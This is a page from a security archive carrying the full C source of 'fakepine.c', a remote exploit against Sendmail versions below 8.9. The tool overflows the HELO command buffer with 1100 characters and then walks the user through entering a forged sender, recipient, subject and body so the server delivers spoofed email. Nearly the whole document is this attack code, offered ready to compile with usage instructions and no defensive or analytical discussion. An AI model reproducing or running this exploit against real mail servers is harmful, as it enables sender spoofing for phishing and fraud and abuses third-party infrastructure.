Remote exploit for Sendmail versions below 8.9 that makes use of the buffer overflow in HELO to send completely spoofed emails.
3d6881cde3b31dc842c49104042ab24e0e162e20e9e27f80f3a49df9dceababe/* fakepine.c for sendmail <8.9 by R3B00T <r3b00t@go2.pl> */
/* ------------------------------------------------------ */
/* this simple exploit overflows buffer for HELO command */
/* so you can send 100% fakemail */
/* usage: ./fakepine <smtpserver> */
/* compile: gcc -Wall -O2 -o fakepine fakepine.c */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>
#include <unistd.h>
#include <arpa/inet.h>
int sock = 0;
void get_response(void);
void say(char *it);
int main(int argc, char* argv[]) {
struct hostent *hp;
struct sockaddr_in addr;
char req[4096];
char mail_from[64];
char rcpt_to[64];
char subject[64];
int i;
printf("fakepine.c for sendmail <8.9 by R3B00T <r3b00t@go2.pl>\n");
if (argc<2) {
printf("usage: %s <smtpserver>\n", argv[0]);
exit(0);
}
hp=gethostbyname(argv[1]);
if (!hp) {
printf("can't resolve %s\n", argv[1]);
exit(0);
}
bzero((char *)&addr, sizeof(addr));
if ((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
printf("can't create socket\n");
exit(0);
}
bcopy(hp->h_addr, (char *)&addr.sin_addr, hp->h_length);
addr.sin_family=AF_INET;
addr.sin_port=htons(25);
if (connect(sock, (struct sockaddr *)&addr, sizeof(addr))!=0) {
printf("can't connect to %s\n", argv[1]);
close(sock);
exit(0);
}
get_response();
sprintf(req, "HELO ");
for (i=0;i<1100;i++) strcat(req, "x");
strcat(req, "\r\n");
say(req);
bzero(req, sizeof(req));
printf("mail from: ");
fgets(mail_from, sizeof(mail_from), stdin);
mail_from[strlen(mail_from)-1]='\0';
sprintf(req, "MAIL FROM:<%s>\r\n", mail_from);
say(req);
bzero(req, sizeof(req));
printf("rcpt to: ");
fgets(rcpt_to, sizeof(rcpt_to), stdin);
rcpt_to[strlen(rcpt_to)-1]='\0';
sprintf(req, "RCPT TO:<%s>\r\n", rcpt_to);
say(req);
say("DATA\r\n");
bzero(req, sizeof(req));
printf("Subject: ");
fgets(subject, sizeof(subject), stdin);
subject[strlen(subject)-1]='\0';
sprintf(req, "Subject: %s\r\n", subject);
send(sock, req, strlen(req), 0);
do {
bzero(req, sizeof(req));
fgets(req, sizeof(req), stdin);
req[strlen(req)-1]='\0';
strcat(req, "\r\n");
if (strcmp(req, ".\r\n")==0)
send(sock, "\r\n.\r\n", 5, 0);
else
send(sock, req, strlen(req), 0);
} while (strcmp(req, ".\r\n")!=0);
fflush(stdout);
say("QUIT\r\n");
shutdown(sock, 2);
close(sock);
return 0;
}
void get_response(void) {
char buff[64];
recv(sock, buff, sizeof(buff), 0);
if (buff[0]!='2' && buff[0]!='3') printf("%s", buff);
}
void say(char *it) {
send(sock, it, strlen(it), 0);
get_response();
}
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed